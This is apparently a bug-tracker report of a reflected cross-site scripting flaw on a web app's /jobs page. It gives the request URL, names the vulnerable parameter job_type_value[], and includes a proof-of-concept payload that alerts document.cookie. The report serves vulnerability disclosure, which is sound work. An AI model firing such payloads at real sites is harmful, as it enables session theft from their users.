[security] XSS on /jobs

[jamesdwilson]

I was able to reproduce this XSS from a post I found on packetnews: https://packetstormsecurity.com/files/152246/
Can you please test this and other issues as I linked above? I was personally unable to verify the others but this one I was.

Thank you.

Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(document.cookie)>